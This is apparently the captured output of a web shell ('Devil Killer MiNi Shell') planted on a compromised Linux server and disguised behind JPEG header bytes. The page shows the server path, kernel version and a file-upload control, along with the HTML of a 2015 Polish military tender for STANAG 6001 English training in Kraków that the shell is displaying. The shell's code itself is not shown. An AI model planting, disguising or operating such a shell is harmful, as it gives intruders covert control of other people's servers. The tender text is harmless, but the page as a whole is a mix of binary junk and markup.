JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151229/355156-N-2015.html

<p class="kh_header"><b>Kraków: Szkolenie z języka angielskiego zgodnie z porozumieniem STANAG 6001
Sygn. 75/SZKOL/15.</b><br>
<b>Numer ogłoszenia: 355156 - 2015; data zamieszczenia: 29.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 3811 , Rząska, ul. Krakowska 2, 30-901 Kraków, woj. małopolskie, tel. +48 261135116, +48 261133017, faks +48 261135059, +48 261135165.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://35wog.wp.mil.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenie z języka angielskiego zgodnie z porozumieniem STANAG 6001
Sygn. 75/SZKOL/15..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1	Przedmiotem zamówienia jest usługa szkolenia z języka angielskiego zgodnie 
z porozumieniem  STANAG 6001.
Zamówienie zostało podzielone na 4 części ze względu na zróżnicowanie wymagań dotyczących szkoleń oraz różne miejsca realizacji (różnych odbiorców) usługi:

Część 1: 
Miejsce szkolenia: ODZJO 6 BPD, ul. Rakowicka 22, Kraków
Termin szkolenia:   I semestr: 08.02.2016 r. - 05.07.2016 r.
			 II semestr: 05.09.2016 r. - 03.02.2017 r.
Ilość grup szkoleniowych w każdym semestrze: poziom 2 - 2 grupy 
				 		        poziom 3 - 1 grupa 
Szacunkowa ilość godzin szkoleniowych: 2544 w tym:
I semestr/poziom 2/gr nr 1 - 456 godzin dla max. 3 lektorów polskojęzycznych 
			     	   - 120 godzin dla native speaker-a
I semestr/poziom 2/gr nr 2 - 456 godzin dla max. 3 lektorów polskojęzycznych 
			     	   - 120 godzin dla native speaker-a
I semestr poziom 3 - 120 godzin dla native speaker-a 
Razem semestr I : 1272 godzin szkoleniowych 

II semestr/poziom 2/gr nr 1 - 456 godzin dla max. 3 lektorów polskojęzycznych 
			     	 - 120 godzin dla native speaker-a
II semestr/poziom 2/gr nr 2 - 456 godzin dla max. 3 lektorów polskojęzycznych 
			     	 - 120 godzin dla native speaker-a
II semestr poziom 3 - 120 godzin dla native speaker-a 
Razem semestr II : 1272 godzin szkoleniowych 
Szczegółowy opis szkolenia dla części nr 1 znajduje się w załączniku nr 11a do SIWZ.

Część 2:
Miejsce szkolenia: 6 bpd, ul. Ułanów 43, Kraków
Termin szkolenia: poziom 1/gr nr 1: 08.02.2016 r. - 01.07.2016 r.
			 poziom 1/gr nr 2: 15.02.2016 r. - 08.04.2016 r.
			 poziom 2: 15.02.2016 r. - 12.04.2016 r.
Szacunkowa ilość godzin szkoleniowych: 1056 w tym:
poziom 1/gr nr 1: 576 godzin dla max. 3 lektorów polskojęzycznych 
poziom 1/gr nr 2: 240 godzin dla max. 3 lektorów polskojęzycznych 
poziom 2: 240 godzin dla max. 3 lektorów polskojęzycznych 
Razem: 1056 godzin szkoleniowych 
Szczegółowy opis szkolenia dla części nr 2 znajduje się w załączniku nr 11b do SIWZ.

Część 3:
Miejsce szkolenia: 6 bdow, ul. Ułanów 43, Kraków
Termin szkolenia:  poziom 2: 15.09.2016 r. - 25.10.2016 r.
Szacunkowa ilość godzin szkoleniowych: 240 godzin dla max. 3 lektorów polskojęzycznych
Razem: 240 godzin szkoleniowych 
Szczegółowy opis szkolenia dla części nr 3 znajduje się w załączniku nr 11c do SIWZ.

Część 4:
Miejsce szkolenia: 79 RPW, ul. Koletek 10 pok. 113, Kraków
Termin szkolenia:  poziom 1: 09.02.2016 r. - 30.06.2016 r. 			      
Szacunkowa ilość godzin szkoleniowych: 100 godzin dla max. 2 lektorów polskojęzycznych 
w następującym trybie - dwa razy w tygodniu
Wtorek w godzinach 13.00 do 14.40 (2x45 min + 10 min przerwy)
Czwartek w godzinach 12.30 do 14.55 (3x45 min + 10 min przerwy)
Razem: 100 godzin szkoleniowych 
Szczegółowy opis szkolenia dla części nr 4 znajduje się w załączniku nr 11d do SIWZ.
Zamawiający zastrzega sobie prawo ograniczenia zakresu przedmiotu zamówienia niniejszej umowy nie więcej niż 20 % o czym zobowiązany będzie powiadomić Wykonawcę pisemnie dotyczy części 1,2,3 oraz 4..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza możliwości zastosowania zamówień uzupełniających wskazanych w art. 67 ust. 1 pkt  6 ustawy Pzp. w okresie 1 roku  od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy usług stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień na warunkach określonych w SIWZ i zgodnie z ustawą Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.58.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 08.02.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> cześć nr 1 w kwocie - 4 500,00 zł (słownie zł: cztery tysiące pięćset)
cześć nr 2 w kwocie -1 900,00 zł  (słownie zł: tysiąc dziewięćset)
cześć nr 3 w kwocie - 400,00 zł (słownie zł: czterysta)
cześć nr 4 w kwocie -  200,00 zł (słownie zł: dwieście)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznaczył szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznaczył szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznaczył szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami zdolnymi do   wykonania zamówienia:
              Zamawiający wymaga, aby Wykonawca dysponował personelem do realizacji przedmiotu zamówienia tj. : 
Dla Część 1: 
a) minimum czterech lektorów polskojęzycznych posiadających niżej opisane kwalifikacje:
- magister filologii angielskiej (minimum dwuletnie doświadczenie liczone od daty uzyskania dyplomu) lub,
- licencjat filologii angielskiej (minimum trzyletnie doświadczenie liczone od daty      uzyskania dyplomu)
   oraz 
- minimum dwóch native speakers posługujących się językiem angielskim jako językiem rodzimym.  
Dla Część 2: 
b) minimum czterech lektorów polskojęzycznych posiadających niżej opisane kwalifikacje:
- magister filologii angielskiej (minimum dwuletnie doświadczenie liczone od daty uzyskania dyplomu) lub,
- licencjat filologii angielskiej (minimum trzyletnie doświadczenie liczone od daty    uzyskania dyplomu). 


Dla Część 3: 
- minimum trzech lektorów polskojęzycznych posiadających niżej opisane kwalifikacje:
- magister filologii angielskiej (minimum dwuletnie doświadczenie liczone od daty uzyskania dyplomu) lub,
- licencjat filologii angielskiej (minimum trzyletnie doświadczenie liczone od daty    uzyskania dyplomu).
Dla Część 4: 
- minimum dwóch lektorów polskojęzycznych posiadających niżej opisane kwalifikacje:
- magister filologii angielskiej (minimum dwuletnie doświadczenie liczone od daty uzyskania dyplomu) lub,
- licencjat filologii angielskiej (minimum trzyletnie doświadczenie liczone od daty    uzyskania dyplomu).
Wykonawca wykaże posiadanie ww. lektorów oraz oświadczy, iż posiadają oni wyżej wymienione kwalifikacje na potwierdzenie spełniania warunku określonego 
w art. 22 ust 1 pkt 3 ustawy Pzp. - wzór zał. nr 9a do SIWZ wykaz osób dla części nr 1, wzór zał. nr 9b do SIWZ wykaz osób dla części nr 2, wzór zał. nr 9c do SIWZ wykaz osób dla części nr 3 oraz wzór zał. nr 9d do SIWZ wykaz osób dla części nr 4
                Wyżej wymienione wykazy stanowią  również podstawę do oceny ofert w drugim kryterium  wyboru oceny ofert tj. PRZYGOTOWANIE FACHOWE LEKTORÓW  PFL.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznaczył szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Przygotowanie fachowe lektorów - 40</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://35wog.wp.mil.pl/pl/37.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 3811
ul. Krakowska 2, Rząska
30-901 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.01.2016 godzina 10:30, miejsce: Jednostka Wojskowa 3811
ul. Krakowska 2, Rząska
30-901 Kraków
 Kancelaria jawna, budynek nr 1, pokój nr 120 (piętro I) w godzinach 8.00 - 11.00 i 13.00 - 15.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa szkolenia z języka angielskiego zgodnie 
z porozumieniem  STANAG 600., Miejsce szkolenia: ODZJO 6 BPD, ul. Rakowicka 22, Kraków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce szkolenia: ODZJO 6 BPD, ul. Rakowicka 22, Kraków
Termin szkolenia:   I semestr: 08.02.2016 r. - 05.07.2016 r.
			 II semestr: 05.09.2016 r. - 03.02.2017 r.
Ilość grup szkoleniowych w każdym semestrze: poziom 2 - 2 grupy 
				 		        poziom 3 - 1 grupa 
Szacunkowa ilość godzin szkoleniowych: 2544 w tym:
I semestr/poziom 2/gr nr 1 - 456 godzin dla max. 3 lektorów polskojęzycznych 
			     	   - 120 godzin dla native speaker-a
I semestr/poziom 2/gr nr 2 - 456 godzin dla max. 3 lektorów polskojęzycznych 
			     	   - 120 godzin dla native speaker-a
I semestr poziom 3 - 120 godzin dla native speaker-a 
Razem semestr I : 1272 godzin szkoleniowych 

II semestr/poziom 2/gr nr 1 - 456 godzin dla max. 3 lektorów polskojęzycznych 
			     	 - 120 godzin dla native speaker-a
II semestr/poziom 2/gr nr 2 - 456 godzin dla max. 3 lektorów polskojęzycznych 
			     	 - 120 godzin dla native speaker-a
II semestr poziom 3 - 120 godzin dla native speaker-a 
Razem semestr II : 1272 godzin szkoleniowych 
Szczegółowy opis szkolenia dla części nr 1 znajduje się w załączniku nr 11a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.58.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 08.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Przygotowanie fachowe lektorów - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa szkolenia z języka angielskiego zgodnie 
z porozumieniem  STANAG 6001.Miejsce szkolenia: 6 bpd, ul. Ułanów 43, Kraków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce szkolenia: 6 bpd, ul. Ułanów 43, Kraków
Termin szkolenia: poziom 1/gr nr 1: 08.02.2016 r. - 01.07.2016 r.
			 poziom 1/gr nr 2: 15.02.2016 r. - 08.04.2016 r.
			 poziom 2: 15.02.2016 r. - 12.04.2016 r.
Szacunkowa ilość godzin szkoleniowych: 1056 w tym:
poziom 1/gr nr 1: 576 godzin dla max. 3 lektorów polskojęzycznych 
poziom 1/gr nr 2: 240 godzin dla max. 3 lektorów polskojęzycznych 
poziom 2: 240 godzin dla max. 3 lektorów polskojęzycznych 
Razem: 1056 godzin szkoleniowych 
Szczegółowy opis szkolenia dla części nr 2 znajduje się w załączniku nr 11b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.58.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 08.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Przygotowanie fachowe lektorów - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa szkolenia z języka angielskiego zgodnie 
z porozumieniem  STANAG 6001.Miejsce szkolenia: 6 bdow, ul. Ułanów 43, Kraków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce szkolenia: 6 bdow, ul. Ułanów 43, Kraków
Termin szkolenia:  poziom 2: 15.09.2016 r. - 25.10.2016 r.
Szacunkowa ilość godzin szkoleniowych: 240 godzin dla max. 3 lektorów polskojęzycznych
Razem: 240 godzin szkoleniowych 
Szczegółowy opis szkolenia dla części nr 3 znajduje się w załączniku nr 11c do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.58.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Przygotowania fachowego lektorów - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa szkolenia z języka angielskiego zgodnie 
z porozumieniem  STANAG 6001.Miejsce szkolenia: 79 RPW, ul. Koletek 10 pok. 113, Kraków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce szkolenia: 79 RPW, ul. Koletek 10 pok. 113, Kraków
Termin szkolenia:  poziom 1: 09.02.2016 r. - 30.06.2016 r. 			      
Szacunkowa ilość godzin szkoleniowych: 100 godzin dla max. 2 lektorów polskojęzycznych 
w następującym trybie - dwa razy w tygodniu
Wtorek w godzinach 13.00 do 14.40 (2x45 min + 10 min przerwy)
